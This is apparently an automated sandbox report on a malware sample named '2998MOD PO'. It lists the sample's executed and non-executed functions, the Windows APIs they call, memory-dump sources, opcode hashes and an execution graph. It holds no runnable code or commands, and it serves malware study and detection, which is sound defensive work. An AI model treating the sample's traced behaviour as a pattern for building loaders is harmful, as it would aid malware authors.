                          • Instruction Fuzzy Hash: 43110FB6C002498FDB14CF9AC444ADEFBF4AB88224F10842AD568B7210D379A545CFA5
                          Function 05643F88 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 470 5643f88-56467da PostMessageW 472 56467e3-56467f7 470->472 473 56467dc-56467e2 470->473 473->472
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 056467CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 452170013f01aa6440af0dbff12febb86e16ff70a34fe1a86295bd92dcb71194
                          • Instruction ID: 862daf132318566208b9ea0566af9e833544e43263575dc80a90eff10fff283c
                          • Opcode Fuzzy Hash: 452170013f01aa6440af0dbff12febb86e16ff70a34fe1a86295bd92dcb71194
                          • Instruction Fuzzy Hash: E011F2B58003489FCB10DF9AD485BDEBBF8EB48320F108419E959A7200C375A984CFA5
                          Function 05646769 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 475 5646769-56467da PostMessageW 477 56467e3-56467f7 475->477 478 56467dc-56467e2 475->478 478->477
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 056467CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 1b4f91953702c665cc296368bbef60a64c25929f75d042c871835dbd593f951b
                          • Instruction ID: 7702ba80fee8dd63eb68e5329a3e27e69128ebda9256e6f987100f59b24543f5
                          • Opcode Fuzzy Hash: 1b4f91953702c665cc296368bbef60a64c25929f75d042c871835dbd593f951b
                          • Instruction Fuzzy Hash: EB1103B5800249DFDB10DF99C485BDEFBF8FB48320F20841AD559A7210C375A984CFA1
                          Function 00F0D3D8 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7b19897eec0229e37733f5270c8a870a778bf04469c5fb1937215474179e09c
                          • Instruction ID: 5bb81a981a12de8bc92eb1beff0904c588db825bd810185c3c378aa8a04f5ca4
                          • Opcode Fuzzy Hash: d7b19897eec0229e37733f5270c8a870a778bf04469c5fb1937215474179e09c
                          • Instruction Fuzzy Hash: 1521377A500204DFDB05DF54D9C0B2BBF65FB98324F20C169E9094B296C336E856FBA2
                          Function 00F1D1D4 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b129c2030ae5b9f2d24859f9e51c5631871e735db9bfac9b8436b6dc496c5248
                          • Instruction ID: 975d9d486ca3a431f1583f227082d3345eba4129256ce148c48a1921bbc537fa
                          • Opcode Fuzzy Hash: b129c2030ae5b9f2d24859f9e51c5631871e735db9bfac9b8436b6dc496c5248
                          • Instruction Fuzzy Hash: A4212671904284EFDB05DF14D9C0B66BBB5FB84324F30C66DE8094B296C33AD886EA61
                          Function 00F1D01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd4241cb9168b443275b13eb99a7a5ec70bf32fec000231ac4fb140f91c0cdb5
                          • Instruction ID: 8b86c33cc68e2577360f38a32aade5ff8174c1547228f3b47634756c5876a6d4
                          • Opcode Fuzzy Hash: bd4241cb9168b443275b13eb99a7a5ec70bf32fec000231ac4fb140f91c0cdb5
                          • Instruction Fuzzy Hash: A821F575504200DFCB14DF14D984B56BB75EB88324F20C56DD80A4B25AC33AD887DA61
                          Function 00F1D005 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd0581a60090b6af27bd246cd7bcb85cea4b3af54848e75445cf93538388d94a
                          • Instruction ID: 84d2f8296d100258e8cf4b29a43c59f3b1075f1e09a8c79adf52549408944d80
                          • Opcode Fuzzy Hash: bd0581a60090b6af27bd246cd7bcb85cea4b3af54848e75445cf93538388d94a
                          • Instruction Fuzzy Hash: 492180755093808FCB02CF24D994756BF71EB46314F28C5EAD8498F2A7C33A984ADB62
                          Function 00F0D3D3 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction ID: 501511c095f53ef4eb63a3e9a813edb89b057594f5a8156ac4ca4eefdf1ddd92
                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction Fuzzy Hash: 1A110376804240CFCB16CF44D5C4B16BF71FB94324F24C2A9DC090B256C33AE85AEBA1
                          Function 00F1D1CF Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                          • Instruction ID: 86081ee818bff8329feade72ded49f8bf511ea4ba3ee6f5d3c090df2a67c7785
                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                          • Instruction Fuzzy Hash: DD11BB75904280DFCB06CF14C9C4B55BBB1FB84324F24C6AAD8494B696C33AD84ADB61
                          Function 00F0D745 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 97bc849e811555fd99a0046155c0768f9663bc2166099da18347f208fcc74343
                          • Instruction ID: 4f7d77d7a945b1f8deee80b03630dc7fb41692f769caba20f9cae0a3044e79ba
                          • Opcode Fuzzy Hash: 97bc849e811555fd99a0046155c0768f9663bc2166099da18347f208fcc74343
                          • Instruction Fuzzy Hash: 44012B324093409AE7108E69CDC4B67FF98DF41334F18C52AED090A2C6C639D841F671
                          Function 00F0D744 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ccbd05bfe56dd511fc74b56885ac3b9aeedd1c011707860a2cf1bd4455c31fc6
                          • Instruction ID: 9c764cd6bf40817734560a6324a102264268c5da32169076ae14958259efcab4
                          • Opcode Fuzzy Hash: ccbd05bfe56dd511fc74b56885ac3b9aeedd1c011707860a2cf1bd4455c31fc6
                          • Instruction Fuzzy Hash: 6DF062724053449AE7148E1AC8C8B66FFA8EB91734F18C45AED085A296C2799845DAB1

                          Non-executed Functions

                          Function 05640F28 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 876d457615757b0eecbe7b80fe4dde82e53ea06a9e5afd92e4a61497ae9ca77d
                          • Instruction ID: 5c0dc045599f5d6c3fc417d231638baade11a80791573cdc2b96b5df28880665
                          • Opcode Fuzzy Hash: 876d457615757b0eecbe7b80fe4dde82e53ea06a9e5afd92e4a61497ae9ca77d
                          • Instruction Fuzzy Hash: 98E1EC74E041198FCB14DFA9C5909AEFBB2BF49304F24C169D815AB35ADB31A981CFA1
                          Function 056437F0 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4419567e2e8a95f2c6638ff3759e8e5064c432c1b9df1b51c86ca4c59d075319
                          • Instruction ID: f73337a2587dcd6b8aa091ee72292bd2b8153c6fbfe237cd6e73213154e3be0d
                          • Opcode Fuzzy Hash: 4419567e2e8a95f2c6638ff3759e8e5064c432c1b9df1b51c86ca4c59d075319
                          • Instruction Fuzzy Hash: 40E10C74E141198FCB14DF99C5809AEFBB2FF49304F24C569D815AB359DB30A981CFA1
                          Function 05641798 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0268df8270b235aafcabe2c9e361d0a2db61739ab523f8b1df3dd1f87f29e846
                          • Instruction ID: ef29c87ff56de9d76317dbe19707c353ca9d0b20bf94c12259c265112ad1b54c
                          • Opcode Fuzzy Hash: 0268df8270b235aafcabe2c9e361d0a2db61739ab523f8b1df3dd1f87f29e846
                          • Instruction Fuzzy Hash: 43E1EB74E142198FCB14DFA9C5909AEFBB2BF89304F24C159D815A7359DB30A981CFA1
                          Function 05642E40 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c051fce9bebb5cccfa1324f23361fe1c266916abe1d819b29397c3dab5c4adb
                          • Instruction ID: 37443b35e6a24f9279209522f0ce720a1be2ca953d1d18f457e94baf911bb2e8
                          • Opcode Fuzzy Hash: 4c051fce9bebb5cccfa1324f23361fe1c266916abe1d819b29397c3dab5c4adb
                          • Instruction Fuzzy Hash: D2E10C74E041198FCB14DF99C5909AEFBB2FF89304F24C659E414A735ADB30A981CF60
                          Function 05641360 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2527cbddec364b15951d0772aea6904feabf73db5f83ab8fece7119e0b507004
                          • Instruction ID: 8e05fef7d4df0c345c48f2308ec856d7e20a056c24faa39d1dd8416b749e7323
                          • Opcode Fuzzy Hash: 2527cbddec364b15951d0772aea6904feabf73db5f83ab8fece7119e0b507004
                          • Instruction Fuzzy Hash: 39E1EBB4E141198FCB14DF99C5909AEFBB2FF49304F24C159D815AB359DB30A981CFA0
                          Function 0117D5FC Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f0627e7ad504c32e1143722020c56161890b7b6a08474b0beda820eb7980b24
                          • Instruction ID: 2d3d182f9590755a39f32f5837ec9e337ae5959b2803a26ba05769cd99a91175
                          • Opcode Fuzzy Hash: 1f0627e7ad504c32e1143722020c56161890b7b6a08474b0beda820eb7980b24
                          • Instruction Fuzzy Hash: B4A19136E0021A8FCF19DFB8D84459EBBB2FF85304B15856AE912BB365DB31D946CB40
                          Function 05641350 Relevance: .1, Instructions: 134COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 77c55f546bb8c3ae92954367ff3ed772c2dea5f8f17919aee60cb6f710b01eca
                          • Instruction ID: feccde414e0cf3fc499732518ad74b0cb16ede40a24736eca6b193fc16c607c0
                          • Opcode Fuzzy Hash: 77c55f546bb8c3ae92954367ff3ed772c2dea5f8f17919aee60cb6f710b01eca
                          • Instruction Fuzzy Hash: 6251FB74E102198BDB14DFA9C9815AEFBF2FF89304F24C269D418A7315DB31A942CFA1
                          Function 05641788 Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e1422fd5612c070002813354b3b23308322680af4135b39274849eaf43cc909
                          • Instruction ID: 61126090c3d418e079f3c88b4fc563349b86b77545fd767df5126dabadaddcf5
                          • Opcode Fuzzy Hash: 9e1422fd5612c070002813354b3b23308322680af4135b39274849eaf43cc909
                          • Instruction Fuzzy Hash: 1951F874E102198BDB14DFA9C9815AEFBF2FF89304F24C269D418A7315DB31A942CFA1
                          Function 05642E30 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f20f230c0decfaaf85e1804114f78f7dd1a52e7ee80d9f69a758fa893af2708d
                          • Instruction ID: e39a120ba20d652483fd159d6bdd9d1b22c09f433da71eade4c7db97e1553db3
                          • Opcode Fuzzy Hash: f20f230c0decfaaf85e1804114f78f7dd1a52e7ee80d9f69a758fa893af2708d
                          • Instruction Fuzzy Hash: 86514F74E142198FDB14DFA9C5915AEFBF2BF89304F24C16AD418A7316D7309942CFA1
                          Function 056437E1 Relevance: .1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c27fe9f7183b6c4408effd81a89e679dd5715f224e92ab5628de83c9572d2dd
                          • Instruction ID: b33494e6cd371a0ff67d7cf00192f79b5d23c534f27d4becbe010d43afbdf01f
                          • Opcode Fuzzy Hash: 2c27fe9f7183b6c4408effd81a89e679dd5715f224e92ab5628de83c9572d2dd
                          • Instruction Fuzzy Hash: 14513CB4E142198FDB14DFA9C5815AEFBF2BF89304F24C56AD418A7356DB309942CFA0

                          Execution Graph

                          Execution Coverage:1.2%
                          Dynamic/Decrypted Code Coverage:5.1%
                          Signature Coverage:8.7%
                          Total number of Nodes:138
                          Total number of Limit Nodes:12
                          execution_graph 91451 42ba43 91452 42ba5d 91451->91452 91455 19c2df0 LdrInitializeThunk 91452->91455 91453 42ba85 91455->91453 91456 424b63 91461 424b7c 91456->91461 91457 424c0c 91458 424bc4 91464 42e573 91458->91464 91461->91457 91461->91458 91462 424c07 91461->91462 91463 42e573 RtlFreeHeap 91462->91463 91463->91457 91467 42c7b3 91464->91467 91466 424bd4 91468 42c7cd 91467->91468 91469 42c7de RtlFreeHeap 91468->91469 91469->91466 91560 42f613 91561 42f623 91560->91561 91562 42f629 91560->91562 91565 42e653 91562->91565 91564 42f64f 91568 42c763 91565->91568 91567 42e66e 91567->91564 91569 42c780 91568->91569 91570 42c791 RtlAllocateHeap 91569->91570 91570->91567 91571 4247d3 91572 4247ef 91571->91572 91573 424817 91572->91573 91574 42482b 91572->91574 91575 42c433 NtClose 91573->91575 91576 42c433 NtClose 91574->91576 91577 424820 91575->91577 91578 424834 91576->91578 91581 42e693 RtlAllocateHeap 91578->91581 91580 42483f 91581->91580 91582 413e13 91583 413e2d 91582->91583 91588 417563 91583->91588 91585 413e4b 91586 413e90 91585->91586 91587 413e7f PostThreadMessageW 91585->91587 91587->91586 91590 417587 91588->91590 91589 41758e 91589->91585 91590->91589 91591 4175da 91590->91591 91592 4175d1 LdrLoadDll 91590->91592 91591->91585 91592->91591 91593 418bd3 91594 418c03 91593->91594 91596 418c2f 91594->91596 91597 41b083 91594->91597 91598 41b0c7 91597->91598 91599 41b0e8 91598->91599 91600 42c433 NtClose 91598->91600 91599->91594 91600->91599 91601 41e293 91602 41e2b9 91601->91602 91606 41e3b6 91602->91606 91607 42f743 91602->91607 91604 41e354 91605 42ba93 LdrInitializeThunk 91604->91605 91604->91606 91605->91606 91608 42f6b3 91607->91608 91609 42f710 91608->91609 91610 42e653 RtlAllocateHeap 91608->91610 91609->91604 91611 42f6ed 91610->91611 91612 42e573 RtlFreeHeap 91611->91612 91612->91609 91613 4138b3 91614 4138d5 91613->91614 91616 42c6c3 91613->91616 91617 42c6e0 91616->91617 91620 19c2c70 LdrInitializeThunk 91617->91620 91618 42c708 91618->91614 91620->91618 91470 401b07 91472 401aa2 91470->91472 91471 401a48 91472->91471 91475 42fae3 91472->91475 91473 401bff 91473->91473 91478 42e0f3 91475->91478 91479 42e117 91478->91479 91490 4072d3 91479->91490 91481 42e140 91489 42e19c 91481->91489 91493 41ae93 91481->91493 91483 42e15f 91487 42e174 91483->91487 91508 42c803 91483->91508 91486 42e18e 91488 42c803 ExitProcess 91486->91488 91504 428113 91487->91504 91488->91489 91489->91473 91492 4072e0 91490->91492 91511 416283 91490->91511 91492->91481 91494 41aebf 91493->91494 91529 41ad83 91494->91529 91497 41aeec 91501 41aef7 91497->91501 91535 42c433 91497->91535 91498 41af20 91498->91483 91500 41af04 91500->91498 91502 42c433 NtClose 91500->91502 91501->91483 91503 41af16 91502->91503 91503->91483 91505 428175 91504->91505 91507 428182 91505->91507 91543 4183d3 91505->91543 91507->91486 91509 42c81d 91508->91509 91510 42c82e ExitProcess 91509->91510 91510->91487 91512 4162a0 91511->91512 91514 4162b9 91512->91514 91515 42cec3 91512->91515 91514->91492 91517 42cedd 91515->91517 91516 42cf0c 91516->91514 91517->91516 91522 42ba93 91517->91522 91520 42e573 RtlFreeHeap 91521 42cf85 91520->91521 91521->91514 91523 42bab0 91522->91523 91526 19c2c0a 91523->91526 91524 42badc 91524->91520 91527 19c2c1f LdrInitializeThunk 91526->91527 91528 19c2c11 91526->91528 91527->91524 91528->91524 91530 41ad9d 91529->91530 91534 41ae79 91529->91534 91538 42bb33 91530->91538 91533 42c433 NtClose 91533->91534 91534->91497 91534->91500 91536 42c44d 91535->91536 91537 42c45e NtClose 91536->91537 91537->91501 91539 42bb4d 91538->91539 91542 19c35c0 LdrInitializeThunk 91539->91542 91540 41ae6d 91540->91533 91542->91540 91544 4183fd 91543->91544 91550 41890b 91544->91550 91551 413a93 91544->91551 91546 41852a 91547 42e573 RtlFreeHeap 91546->91547 91546->91550 91548 418542 91547->91548 91549 42c803 ExitProcess 91548->91549 91548->91550 91549->91550 91550->91507 91555 413ab3 91551->91555 91553 413b1c 91553->91546 91554 413b12 91554->91546 91555->91553 91556 41b1a3 RtlFreeHeap LdrInitializeThunk 91555->91556 91556->91554 91557 418b28 91558 42c433 NtClose 91557->91558 91559 418b32 91558->91559 91621 19c2b60 LdrInitializeThunk

                          Executed Functions

                          Function 00417563 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 177 417563-41757f 178 417587-41758c 177->178 179 417582 call 42f153 177->179 180 417592-4175a0 call 42f753 178->180 181 41758e-417591 178->181 179->178 184 4175b0-4175c1 call 42dbc3 180->184 185 4175a2-4175ad call 42f9f3 180->185 190 4175c3-4175d7 LdrLoadDll 184->190 191 4175da-4175dd 184->191 185->184 190->191
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                          • Instruction ID: bdce513adcdf66a5ddf40d0a2ecde4d7099c94072a20f6ffb4ae009ad51faa44
                          • Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                          • Instruction Fuzzy Hash: B00171B1E0020DBBDF10DBE1DC42FDEB379AB54308F4081AAE90897241F634EB588B95
                          Function 0042C433 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 219 42c433-42c46c call 404713 call 42d6b3 NtClose
                          APIs
                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C467
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                          • Instruction ID: 37a102a096cf0697ac499042812ebe3be0a6e3a94df1b2a833282852239f11ec
                          • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                          • Instruction Fuzzy Hash: 7DE04F766002147BD620BA5AEC41F97775CDFC5714F00801AFA0867282C675791087F5
                          Function 019C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
                          • Instruction ID: 32b65fe00499e4ff81c3b0417a4166d98108297b3e27473672d9aa1a73bb1455
                          • Opcode Fuzzy Hash: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
                          • Instruction Fuzzy Hash: 9090026520251003410571584418616805E97E0201B55C021E1054590EC52589916226
                          Function 019C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
                          • Instruction ID: c08d561886b6c0464f8df0167ea70c49d75b589606419e154d2d0964525db4a7
                          • Opcode Fuzzy Hash: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
                          • Instruction Fuzzy Hash: FE90023520151413D11171584508707405D97D0241F95C412E0464558ED6568A52A222
                          Function 019C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
                          • Instruction ID: ef6e9b01fee5c1c57a293d314e6ddcc7f04b09b9d885b6a3e199d36c37f05570
                          • Opcode Fuzzy Hash: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
                          • Instruction Fuzzy Hash: BF90023520159802D1107158840874A405997D0301F59C411E4464658EC69589917222
                          Function 019C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
                          • Instruction ID: 3339c266c4420204e4cfa94d50dfe09dd73bfae8ac9d51ff37cc169ac7a629e5
                          • Opcode Fuzzy Hash: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
                          • Instruction Fuzzy Hash: 6290023560561402D10071584518706505997D0201F65C411E0464568EC7958A5166A3
                          Function 00413D7A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
